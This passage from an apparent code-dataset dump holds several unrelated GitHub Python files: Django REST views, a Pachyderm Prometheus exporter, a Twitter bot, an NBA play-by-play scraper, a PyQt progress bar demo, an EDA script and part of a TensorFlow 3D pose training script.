bridge.transit.save()\n\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def perform_create(self, serializer):\n instance = serializer.save()\n bridge = set(self.request.data[\"can_see\"])\n for obj_id in bridge:\n Bridge.objects.create(object_id=obj_id, transit=instance)\n create_circuit_transit(instance)\n\n\nclass RetrieveUpdateDelete(RetrieveUpdateDestroyAPIView):\n queryset = Transit.objects.all()\n lookup_field = \"pk\"\n serializer_class = TransitCreateSerializer\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = TransitDetailSerializer(instance)\n return Response(serializer.data)\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n prev_trassa = set(instance.trassa.all())\n new_trassa = set(Object.objects.get(id=pk) for pk in self.request.data[\"trassa\"])\n deleted_object = prev_trassa - new_trassa\n\n if self.request.data[\"create_circuit_transit\"]:\n if not check_circuit_transit(deleted_object):\n return Response({\n \"detail\": \"Подчиненные каналы состоят в трассах, которые выходят за рамки расформировываемого.\"},\n status=status.HTTP_403_FORBIDDEN)\n\n if not check_circuit_transit(new_trassa):\n return Response({\"detail\": \"Транзит провести нельзя, оконечный объект трассы участвует в транзите\"},\n status=status.HTTP_403_FORBIDDEN)\n added_object = new_trassa - prev_trassa\n\n for obj in added_object:\n for bridge in obj.bridges.filter(transit__create_circuit_transit=True):\n bridge.transit.create_circuit_transit = False\n bridge.transit.save()\n\n trassa = serializer.save()\n trassa.can_see.all().delete()\n bridge = self.request.data[\"can_see\"]\n\n for obj_id in bridge:\n Bridge.objects.create(object_id=obj_id, transit=trassa)\n\n if self.request.data[\"create_circuit_transit\"]:\n create_circuit_transit(trassa)\n for deleted_object in prev_trassa - set(trassa.trassa.all()):\n\n for circuit in deleted_object.circuit_object_parent.all():\n if not circuit.trassa or circuit.trassa.obj_trassa == instance:\n circuit_transit = CircuitTransit.objects.create()\n circuit_transit.trassa.add(circuit)\n circuit.trassa = circuit_transit\n circuit.is_modified = False\n circuit.save()\n\n if getattr(instance, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # forcibly invalidate the prefetch cache on the instance.\n instance._prefetched_objects_cache = {}\n\n return Response(serializer.data)\n\n def perform_destroy(self, instance):\n if instance.create_circuit_transit:\n if not check_circuit_transit(instance.trassa.all()):\n return Response({\"detail\": \"Удалить нельзя, объекты участвуют в транзите\"},\n status=status.HTTP_403_FORBIDDEN)\n\n for obj in instance.trassa.all().iterator():\n\n for circuit in obj.circuit_object_parent.all():\n if not circuit.trassa or circuit.trassa.obj_trassa == instance:\n circuit_transit = CircuitTransit.objects.create()\n circuit_transit.trassa.add(circuit)\n circuit.trassa = circuit_transit\n circuit.is_modified = False\n circuit.save()\n instance.delete()\n\n\nclass TransitListAPIView(APIView):\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = get_object_or_404(Object, pk=pk)\n serializer = BridgeListSerializer(obj.bridges.all(), many=True)\n return Response(serializer.data)\n","repo_name":"ainurabek/ouss","sub_path":"apps/opu/objects/trassa.py","file_name":"trassa.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13511203858","text":"import argparse\nfrom prometheus_client import start_http_server, Gauge\nimport time\nimport python_pachyderm\n\ngauges = dict()\nsuccescounters = dict()\nfailcounters = dict()\n\n\ndef update_gauges(client):\n global gauges\n pipelines = client.list_pipeline().pipeline_info\n for pipeline in pipelines:\n name = str(pipeline.pipeline.name).replace(\"-\", \"_\")\n if name in gauges:\n print(\"{} updated\".format(name))\n gauges[name].set(pipeline.last_job_state)\n # if pipeline.job_counts[3] > succescounters[name]:\n # gauges[name].set(0)\n # succescounters[name] = pipeline.job_counts[3]\n # if pipeline.job_counts[2] > failcounters[name]:\n # gauges[name].set(1)\n # succescounters[name] = pipeline.job_counts[2]\n\n\ndef main():\n global gauges\n args = parse_args()\n port = args.port\n host = args.host\n\n pachyclient = python_pachyderm.Client().new_from_pachd_address(\"{}:{}\".format(host, port))\n start_http_server(port=9426)\n pipelines = pachyclient.list_pipeline().pipeline_info\n for pipeline in pipelines:\n name = str(pipeline.pipeline.name).replace(\"-\", \"_\")\n\n last_job_state = pipeline.last_job_state\n g = Gauge(\"{}_last_job\".format(name),\n \"Last Job status of pipeline {}\".format(name))\n gauges[name] = g\n succescounters[name] = pipeline.job_counts[3]\n failcounters[name] = pipeline.job_counts[2]\n while True:\n update_gauges(pachyclient)\n time.sleep(60)\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser(description='Prometheus exporter for PachyDerm metrics')\n parser.add_argument(\"-i\", \"--host\", type=str, default=\"pachd\", help=\"Host of pachd\")\n parser.add_argument(\"-p\", \"--port\", type=int, default=30650,\n help=\"port number\")\n\n return parser.parse_args(args=args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DjankoSkalidge/pychyderm-exporter","sub_path":"src/pychyderm-exporter.py","file_name":"pychyderm-exporter.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10736178244","text":"import tweepy\nimport json\nfrom pprint import pprint\nfrom time import sleep\nfrom pyshorteners import Shortener\nfrom credentials import *\nimport datetime\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\nshortener = Shortener('Isgd')\n\nwith open('punten.json') as data_file:\n data = json.load(data_file)\n\ncount_read = open(\"count.txt\", \"r\")\ncount = int(count_read.read())\ncount_read.close()\n\nnow = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n\ndef update_status():\n if count <= len(data):\n item = data[count]\n text = item[\"tekst\"][:115]\n base_long_url = 'https://programma.gl/'\n slug = item[\"slug\"]\n long_url = base_long_url + slug\n short_url = shortener.short(long_url)\n tweet = text + '…—' + short_url\n try:\n api.update_status(tweet)\n new_count = count + 1\n count_write = open(\"count.txt\", \"w\")\n count_write.truncate()\n count_write.write(str(new_count))\n count_write.close()\n log_write = open(\"log.txt\", \"w\")\n log_write.write(str(now + ' - ' + tweet))\n log_write.close()\n except tweepy.TweepError as e:\n log_write = open(\"log.txt\", \"w\")\n log_write.write(str(now + ' - ' + e.reason))\n log_write.close()\n\nupdate_status()\n","repo_name":"programmaGL/glbot","sub_path":"glbot.py","file_name":"glbot.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1384664866","text":"from gazpacho import get, Soup\nimport time\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport re\nimport datetime as DT\n\ndef get_pbp_links(url):\n html = get(url)\n soup = Soup(html)\n data = soup.find('td', {'data-stat': 'date_game'})\n links = [l.find('a') for l in data]\n pbp_links = [\"https://www.basketball-reference.com\" + l.attrs['href'].replace('scores/','scores/pbp/') for l in links]\n return pbp_links\n\ndef get_table_data(url):\n html = get(url)\n soup = Soup(html)\n table = soup.find('table', {'id': 'pbp'})\n table_data = table.find('td', {'class': 'center'})\n scores = [t.text for t in table_data]\n rows = table.find('tr',strict=True)\n times = []\n for i in rows:\n try:\n time = i.find('td', mode='first')\n times.append(time.text)\n except (IndexError, TypeError) as e:\n pass\n return scores, times\n\ndef time_played(times,scores):\n q1 = DT.datetime(1900,1,1,0,12)\n q2 = DT.datetime(1900,1,1,0,24)\n q3 = DT.datetime(1900,1,1,0,36)\n q4 = DT.datetime(1900,1,1,0,48)\n ot1 = DT.datetime(1900,1,1,0,53)\n ot2 = DT.datetime(1900,1,1,0,58)\n ot3 = DT.datetime(1900,1,1,1,3)\n ot4 = DT.datetime(1900,1,1,1,8)\n ot5 = DT.datetime(1900,1,1,1,13)\n\n second_quart_counter = 0\n third_quart_counter = 0\n fourth_quart_counter = 0\n ot_counter = 0\n time_played = []\n\n for t,s in zip(times,scores):\n t = DT.datetime.strptime(t, '%M:%S')\n if 'Start of 2nd quarter' in s:\n second_quart_counter += 1\n elif 'Start of 3rd quarter' in s:\n third_quart_counter += 1\n elif 'Start of 4th quarter' in s:\n fourth_quart_counter += 1\n elif ('Start' in s) & ('overtime' in s):\n ot_counter += 1\n elif 'End of 2nd quarter' in s:\n second_quart_counter -= 1\n elif 'End of 3rd quarter' in s:\n third_quart_counter -= 1\n elif 'End of 4th quarter' in s:\n fourth_quart_counter -= 1\n\n if second_quart_counter == 1:\n t = (q2-t).total_seconds()/60\n time_played.append(t)\n elif third_quart_counter == 1:\n t = (q3-t).total_seconds()/60\n time_played.append(t)\n elif fourth_quart_counter == 1:\n t = (q4-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 1:\n t = (ot1-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 2:\n t = (ot2-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 3:\n t = (ot3-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 4:\n t = (ot4-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 5:\n t = (ot5-t).total_seconds()/60\n time_played.append(t)\n else:\n t = (q1-t).total_seconds()/60\n time_played.append(t)\n return time_played\n\ndef strip_score(score):\n home = []\n away = []\n for s in score:\n h = re.findall(r'[0-9]{1,3}$',s)[0]\n a = re.findall(r'^[0-9]{1,3}',s)[0]\n home.append(h)\n away.append(a)\n return home, away\n\ndef get_data(url):\n scores, times = get_table_data(url)\n\n df = pd.DataFrame({\n 'time': times,\n 'score': scores\n })\n\n df['time'] = df['time'].apply(lambda x:re.findall(r'[0-9]{1,2}:[0-9]{2}',x)[0])\n\n df['time'] = time_played(df['time'],df['score'])\n\n #remove duplicates\n df.drop_duplicates(inplace=True)\n\n # remove indicator of start/end of quarter\n df = df[df['score'].str.contains('-')]\n\n home, away = strip_score(df['score'])\n df['home'] = home\n df['away'] = away\n\n df.drop('score',axis=1,inplace=True)\n df['home'] = df['home'].astype(int)\n df['away'] = df['away'].astype(int)\n\n home_win = df['home'].iloc[-1] > df['away'].iloc[-1]\n df['home_win'] = [home_win] * len(df['home'])\n\n return df\n\n# Base url for season 2017-2018\nseason_17_18_base_url = \"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&match=game&lg_id=NBA&team_seed_cmp=eq&opp_seed_cmp=eq&year_min=2018&year_max=2018&is_range=N&game_num_type=team&order_by=date_game\"\n# Base url for season 2018-2019\nseason_18_19_base_url = \"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&match=game&lg_id=NBA&team_seed_cmp=eq&opp_seed_cmp=eq&year_min=2019&year_max=2019&is_range=N&game_num_type=team&order_by=date_game\"\n\n# Get 2018-2019 season game links\n# New list to store links to play by play data\npbp_links_17_18 = get_pbp_links(season_17_18_base_url)\n\n# loop through season 17_18 games and save play by play(pbp) game urls into season_17_18_url\n# change url offset\nfor _ in tqdm(range(100, 2624, 100)):\n offset = _\n season_17_18_url = f\"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&player=&match=game&lg_id=NBA&year_min=2018&year_max=2018&team_id=&opp_id=&is_range=N&is_playoffs=&round_id=&best_of=&team_seed=&opp_seed=&team_seed_cmp=eq&opp_seed_cmp=eq&game_num_type=team&game_num_min=&game_num_max=&game_month=&game_location=&game_result=&is_overtime=&c1stat=&c1comp=&c1val=&c2stat=&c2comp=&c2val=&c3stat=&c3comp=&c3val=&c4stat=&c4comp=&c4val=&order_by=date_game&order_by_asc=&offset={offset}\"\n links = get_pbp_links(season_17_18_url)\n pbp_links_17_18.extend(links)\n time.sleep(1)\n\npbp_links_17_18 = np.unique(pbp_links_17_18)\n\n# Get 2018-2019 season game links\npbp_links_18_19 = get_pbp_links(season_18_19_base_url)\n\n# loop through season 18_19 games\n# change url offset\nfor _ in tqdm(range(100, 2624, 100)):\n offset = _\n season_18_19_url = f\"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&player=&match=game&lg_id=NBA&year_min=2019&year_max=2019&team_id=&opp_id=&is_range=N&is_playoffs=&round_id=&best_of=&team_seed=&opp_seed=&team_seed_cmp=eq&opp_seed_cmp=eq&game_num_type=team&game_num_min=&game_num_max=&game_month=&game_location=&game_result=&is_overtime=&c1stat=&c1comp=&c1val=&c2stat=&c2comp=&c2val=&c3stat=&c3comp=&c3val=&c4stat=&c4comp=&c4val=&order_by=date_game&order_by_asc=&offset={offset}\"\n links = get_pbp_links(season_18_19_url)\n pbp_links_18_19.extend(links)\n time.sleep(1)\n\npbp_links_18_19 = np.unique(pbp_links_18_19)\n\n# Define table for 17-18 data\ndf_17_18 = pd.DataFrame({\n 'time':[] ,\n 'home':[] ,\n 'away':[],\n 'home_win':[]\n})\n\n\n# Loop through the links in 17-18 season games and add all data into df_17_18\nfor l in tqdm(pbp_links_17_18):\n try:\n data = get_data(l)\n df_17_18 = df_17_18.append(data)\n time.sleep(1)\n except ValueError:\n pass\n\n# Define table for 18-19 data\ndf_18_19 = pd.DataFrame({\n 'time': [],\n 'home': [],\n 'away': [],\n 'home_win':[]\n})\n\n# Loop through the links in 18-19 season games and add all data into df_18_19\nfor l in tqdm(pbp_links_18_19):\n try:\n data = get_data(l)\n df_18_19 = df_18_19.append(data)\n time.sleep(1)\n except ValueError:\n pass\n\n# Export 17-18 season game data to csv\ndf_17_18.to_csv('/home/nthock/Documents/capstone/data/season_17_18.csv', index=False)\n\n# Export 18-19 season game data to to_csv\ndf_18_19.to_csv('/home/nthock/Documents/capstone/data/season_18_19.csv', index=False)\n","repo_name":"teckhockng/capstone","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71356047788","text":"def multiply_arrays(array1, array2):\n result = []\n number_of_iterations = 0\n\n for number1 in array1:\n print(f'Array 1: {number1}')\n for number2 in array2:\n print(f'Array 2: {number2}')\n result.append(number1 * number2)\n number_of_iterations += 1\n\n print(f'{number_of_iterations} iterações!')\n return result\n\n # sum_array(array_com_dois_mil_numeros)\n # O tempo de execução deste algoritmo foi 0.45s\n\n # sum_array(array_com_quatro_mil_numeros)\n # Já esse teve tempo de execução de 1.8s, cerca de quatro vezes maior.\n\n\nmeu_array = [1,2,3,4,5]\n\nmultiply_arrays(meu_array, meu_array)\n\n# para um algoritmo O(n²) , aumentar a entrada em n vezes, aumenta o tempo de execução em n² vezes!\n\n\"\"\" 25 iterações! \"\"\"","repo_name":"DiSerafim/trybe-exercises","sub_path":"ciencia-computacao/bloco_35-algoritimos/35.1-complexidade-de-algoritmos/complexidade-quadratica.py","file_name":"complexidade-quadratica.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25724511326","text":"# PyQt progressbar\n\n# Example : QProgressBar ()\n\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass ProgressBar(QWidget): # child class\n\n def __init__(self): # child class constructor\n super().__init__() # parent class constructor\n\n self.window() # function calling inside child class constructor\n\n def window(self): # function\n\n self.label = QLabel(\"ProgressBar\",self) # initializing QLable with name 'ProgressBar'\n self.label.move(140,80) # lable position\n self.label.setFont(QFont(\"Aerial\",12)) # lable font\n\n self.pbar = QProgressBar(self) # initializing QProgressBar()\n self.pbar.setGeometry(100,120,250,25) # pbar position and size\n\n self.button = QPushButton(\"Start\",self) # initializing QPushButton()\n self.button.move(160,160)\n self.button.clicked.connect(self.doAction) # when the the button se pressed doAction function is called\n\n self.timer = QBasicTimer() # initializing QBasicTimer() for time events\n self.step = 0 # initilaizing a variable step\n\n self.setGeometry(300,300,400,250) # main window position and size\n self.setWindowTitle(\"PyQt ProgressBar\") # main window title\n self.show() # showing all the windows\n\n def timerEvent(self,e): # timerEvent function from QBasicTimer for handling time event\n if self.step >= 100: # condition\n self.timer.stop() # stop timer\n self.button.setText('Finished') # changing button text\n return\n\n self.step = self.step + 1 # incrementing step variable\n self.pbar.setValue(self.step) # setting pbar value \n\n def doAction(self): # doAction function for handling button pressing\n if self.timer.isActive(): # condition\n self.timer.stop() # stop timer\n self.button.setText(\"Start\") # change button text\n else:\n self.timer.start(100,self) # start timer with 100 miliseconds\n self.button.setText(\"Stop\") # change button text\n\ndef main():\n app = QApplication(sys.argv)\n ProgressBar_Obj = ProgressBar()\n sys.exit(app.exec_())\n\nif __name__==\"__main__\":\n main()","repo_name":"ankit-0044/Python","sub_path":"Python Gui/10.01_QProgressBar.py","file_name":"10.01_QProgressBar.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1230030282","text":"# Exploratory Data Analysis\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndataset = pd.read_csv('structred_data.csv')\r\ndataset.head()\r\ndataset.columns\r\n\r\ndf = dataset.iloc[:, 1: ]\r\ndf.columns\r\n\r\n# removing duplicate data\r\n\r\ncountry= df['Country_Name'].value_counts()\r\nregion= df['Region'].value_counts()\r\ncity= df['City'].value_counts()\r\n\r\ndf.describe()\r\ndf.dtypes\r\n\r\nfrom datetime import datetime,time\r\n\r\ndate= []\r\ntime= []\r\nfor i in range(0, 127826):\r\n a=i\r\n aa = df.timestamp[i][0:10]\r\n date.append(aa)\r\n ab = df.timestamp[i][11:-1]\r\n time.append(ab)\r\n\r\ndate.append(df.timestamp[125825][0:10])\r\ntime.append(df.timestamp[125825][11:-1])\r\n\r\n# Creating a Date column to store the actual Date format for the given Month column\r\ndf[\"Date\"] = date\r\ndf[\"time\"] = time\r\n\r\n\r\ndf[\"Date\"]= pd.to_datetime(df.Date)\r\ndf[\"time\"]= pd.to_datetime(df.time)\r\n\r\n\r\n\r\ndf[\"Date1\"] = pd.to_datetime(df.Date,format=\"%b-%y\")\r\n\r\n# Extracting Day, weekday name, month name, year from the Date column using \r\n# Date functions from pandas \r\n\r\ndf[\"month\"] = df.Date1.dt.strftime(\"%b\") # month extraction\r\ndf[\"Day\"] = df.Date1.dt.strftime(\"%d\") # Day extraction\r\ndf[\"wkday\"] = df.Date1.dt.strftime(\"%A\") # weekday extraction\r\ndf[\"year\"] = df.Date1.dt.strftime(\"%Y\") # year extraction\r\n\r\ndf.columns\r\n\r\nnew_df= df[['Date', 'time', 'Date1', 'month','Day', 'wkday', 'year', 'Unread','IP', \r\n 'Country_Code','Country_Name', 'Region', 'City','User_Agent', \r\n 'Platform', 'Browser']]\r\n\r\nnew_df.to_csv('cleaned_structred_data.csv')\r\n","repo_name":"amitdivekar30/-Topic-Mining-Exploratory-Analysis","sub_path":"EDA_structred_Data.py","file_name":"EDA_structred_Data.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28894746173","text":"from django.forms import model_to_dict\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.response import Response\nfrom .models import Movie\nfrom .serializer import MovieSerializer, MovieOrderSerializer\nfrom rest_framework.pagination import PageNumberPagination\nfrom users.permissions import IsAdminAccount\nimport ipdb\n\n\n# Create your views here.\nclass MoviesView(APIView, PageNumberPagination):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly, IsAdminAccount]\n\n def get(self, req):\n movies = Movie.objects.all()\n pages = self.paginate_queryset(movies, req)\n serializer = MovieSerializer(pages, many=True)\n return self.get_paginated_response(serializer.data)\n\n def post(self, req):\n self.check_object_permissions(req, obj=None)\n serializer = MovieSerializer(data=req.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(user=req.user)\n return Response(serializer.data, 201)\n\n\nclass MoviesDetailsView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly, IsAdminAccount]\n\n def get(self, req, movie_id):\n self.check_object_permissions(req, obj=None)\n movie = get_object_or_404(Movie, id=movie_id)\n serializer = MovieSerializer(movie)\n return Response(serializer.data, 200)\n\n def delete(self, req, movie_id):\n self.check_object_permissions(req, obj=None)\n movie = get_object_or_404(Movie, id=movie_id)\n movie.delete()\n return Response(status=204)\n\n\nclass MoviesOrderView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def post(self, req, movie_id):\n movie_find = get_object_or_404(Movie, id=movie_id)\n serializer = MovieOrderSerializer(data=req.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(movie=movie_find, user=req.user)\n return Response(serializer.data, 201)\n","repo_name":"AlexsonPereira/Filmes_API_Python","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72948898987","text":"\n\"\"\"Predicting 3d poses from 2d joints\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport random\nimport sys\nimport time\nimport h5py\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\nimport procrustes\n\nimport viz\nimport cameras\nimport data_utils\nimport linear_model\nimport csv\nimport os, glob, json, tqdm\nimport numpy as np\nimport pandas as pd\n\n\ntf.app.flags.DEFINE_float(\"learning_rate\", 1e-3, \"Learning rate\")\ntf.app.flags.DEFINE_float(\"dropout\", 0.5, \"Dropout keep probability. 1 means no dropout\")\ntf.app.flags.DEFINE_integer(\"batch_size\", 36000, \"Batch size to use during training\")\ntf.app.flags.DEFINE_integer(\"epochs\", 7200, \"How many epochs we should train for\")\ntf.app.flags.DEFINE_integer(\"period_epoch_eval\", 5, \"Epoch period for evaluation and save\")\ntf.app.flags.DEFINE_boolean(\"max_norm\", True , \"Apply maxnorm constraint to the weights\")\ntf.app.flags.DEFINE_boolean(\"batch_norm\", True, \"Use batch_normalization\")\ntf.app.flags.DEFINE_boolean(\"centering_2d\", True , \"Use centering 2d around root\")\ntf.app.flags.DEFINE_string(\"optimizer\", \"Adam\", \"Optimizer to use\") # SGD / Adam\ntf.app.flags.DEFINE_integer(\"idx_split\", -1, \"index for splitubg train_val list\") # -1 ~ 7 -1: original split 0~7: newly added split\n\n# Data loading\ntf.app.flags.DEFINE_boolean(\"predict_14\", False, \"predict 14 joints\")\ntf.app.flags.DEFINE_string(\"action\",\"All\", \"The action to train on. 'All' means all the actions\")\n\n# Architecture\ntf.app.flags.DEFINE_integer(\"linear_size\", 1024, \"Size of each model layer.\")\ntf.app.flags.DEFINE_integer(\"num_layers\", 4, \"Number of layers in the model.\")\ntf.app.flags.DEFINE_boolean(\"residual\", True, \"Whether to add a residual connection every 2 layers\")\n\n# Evaluation\ntf.app.flags.DEFINE_boolean(\"for_submission\", False, \"Whether to use Test(true) or Val(not)\")\ntf.app.flags.DEFINE_boolean(\"procrustes\", True, \"Apply procrustes analysis at test time\")\ntf.app.flags.DEFINE_boolean(\"evaluateActionWise\",False, \"The dataset to use either h36m or heva\")\n\n# Directories\ntf.app.flags.DEFINE_string(\"cameras_path\",\"data/h36m/cameras.h5\",\"Directory to load camera parameters\")\ntf.app.flags.DEFINE_string(\"data_dir\", \"data/h36m_eccv18_challenge/\", \"Data directory\") #data/h36m_muzi data/h36m_eccv18_challenge/\ntf.app.flags.DEFINE_string(\"detector_2d\", \"cpm\", \"2D pose detector name\") #GT_pose_2d cpm\ntf.app.flags.DEFINE_string(\"train_dir\", \"experiments_eccv18\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"prediction_dir\", \"eccv18_out\", \"3D prediction directory\")\n\n# Train or load\ntf.app.flags.DEFINE_string(\"mode\", 'eval', \"Experiment mode\") # train / eval / generate\ntf.app.flags.DEFINE_boolean(\"use_cpu\", False, \"Whether to use the CPU\")\ntf.app.flags.DEFINE_integer(\"load\", 4241, \"Try to load a previous checkpoint.\") #7800 2400\n\n\n\n# Misc\ntf.app.flags.DEFINE_boolean(\"use_fp16\", False, \"Train using fp16 instead of fp32.\")\n\nFLAGS = tf.app.flags.FLAGS\n\n\n\nFLAGS.prediction_dir = FLAGS.prediction_dir + \"_\" + str(FLAGS.idx_split)\n\n\ntrain_dir = os.path.join( FLAGS.train_dir,\n 'split_{0}'.format(FLAGS.idx_split),\n 'dropout_{0}'.format(FLAGS.dropout),\n 'epochs_{0}'.format(FLAGS.epochs) if FLAGS.epochs > 0 else '',\n 'lr_{0}'.format(FLAGS.learning_rate),\n 'residual' if FLAGS.residual else 'not_residual',\n 'depth_{0}'.format(FLAGS.num_layers),\n 'linear_size{0}'.format(FLAGS.linear_size),\n 'batch_size_{0}'.format(FLAGS.batch_size),\n 'procrustes' if FLAGS.procrustes else 'no_procrustes',\n 'maxnorm' if FLAGS.max_norm else 'no_maxnorm',\n 'batch_normalization' if FLAGS.batch_norm else 'no_batch_normalization',\n '{0}'.format(FLAGS.detector_2d),\n # 'predict_14' if FLAGS.predict_14 else 'predict_17',\n 'center_2d' if FLAGS.centering_2d else 'not_center_2d')\n\n\nprint (train_dir)\nsummaries_dir = os.path.join( train_dir, \"log\" ) # Directory for TB summaries\n\n# To avoid race conditions: https://github.com/tensorflow/tensorflow/issues/7448\nos.system('mkdir -p {}'.format(summaries_dir))\n\ndef create_model( session, actions, batch_size, centering_2d = False, optimizer = \"Adam\", for_eccv18 = False):\n \"\"\"\n Create model and initialize it or load its parameters in a session\n\n Args\n session: tensorflow session\n actions: list of string. Actions to train/test on\n batch_size: integer. Number of examples in each batch\n Returns\n model: The created (or loaded) model\n Raises\n ValueError if asked to load a model, but the checkpoint specified by\n FLAGS.load cannot be found.\n \"\"\"\n\n model = linear_model.LinearModel(\n FLAGS.linear_size,\n FLAGS.num_layers,\n FLAGS.residual,\n FLAGS.batch_norm,\n FLAGS.max_norm,\n batch_size,\n FLAGS.learning_rate,\n summaries_dir,\n FLAGS.predict_14,\n dtype=tf.float16 if FLAGS.use_fp16 else tf.float32,\n centering_2d = centering_2d,\n optimizer = optimizer,\n for_eccv18 = for_eccv18\n )\n\n if FLAGS.load <= 0:\n # Create a new model from scratch\n print(\"Creating model with fresh parameters.\")\n session.run( tf.global_variables_initializer() )\n return model\n\n # Load a previously saved model\n ckpt = tf.train.get_checkpoint_state( train_dir, latest_filename=\"checkpoint\")\n print( \"train_dir\", train_dir )\n\n if ckpt and ckpt.model_checkpoint_path:\n # Check if the specific checkpoint exists\n if FLAGS.load > 0:\n if os.path.isfile(os.path.join(train_dir,\"checkpoint-{0}.index\".format(FLAGS.load))):\n ckpt_name = os.path.join( os.path.join(train_dir,\"checkpoint-{0}\".format(FLAGS.load)) )\n else:\n raise ValueError(\"Asked to load checkpoint {0}, but it does not seem to exist\".format(FLAGS.load))\n else:\n ckpt_name = os.path.basename( ckpt.model_checkpoint_na )\n\n print(\"Loading model {0}\".format( ckpt_name))\n # model.saver.restore( session, ckpt.model_checkpoint_path ) # critical error\n model.saver.restore(session, ckpt_name) # critical error\n\n return model\n else:\n print(\"Could not find checkpoint. Aborting.\")\n raise( ValueError, \"Checkpoint {0} does not seem to exist\".format( ckpt.model_checkpoint_path ) )\n\n return model\n\n\n\ndef train_eccv18():\n \"\"\"Train a linear model for 3d pose estimation\"\"\"\n\n actions = data_utils.define_actions( FLAGS.action )\n\n\n # Load 3d data\n train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3)\n\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2)\n\n # Avoid using the GPU if requested\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.Session(config=tf.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True)) as sess:\n\n print(\"\\n**********************************device_count**********************************\\ndevice_count\\n\\n\\n\")\n # === Create the model ===\n print(\"Creating %d bi-layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model( sess, actions, FLAGS.batch_size, FLAGS.centering_2d, FLAGS.optimizer, for_eccv18=True)\n model.train_writer.add_graph( sess.graph )\n print(\"Model (%d step) created\" %FLAGS.load)\n\n #=== This is the training loop ===\n step_time, loss, val_loss = 0.0, 0.0, 0.0\n current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1\n previous_losses = []\n\n step_time, loss = 0, 0\n current_epoch = 0\n log_every_n_batches = 2\n\n for i_epoch in xrange( FLAGS.epochs ):\n current_epoch = current_epoch + 1\n\n # === Load training batches for one epoch ===\n encoder_inputs, decoder_outputs = model.get_all_batches_eccv18( train_set_2d, train_set_3d, training=True )\n nbatches = len( encoder_inputs )\n print(\"There are {0} train batches\".format( nbatches ))\n start_time, loss = time.time(), 0.\n\n g_step 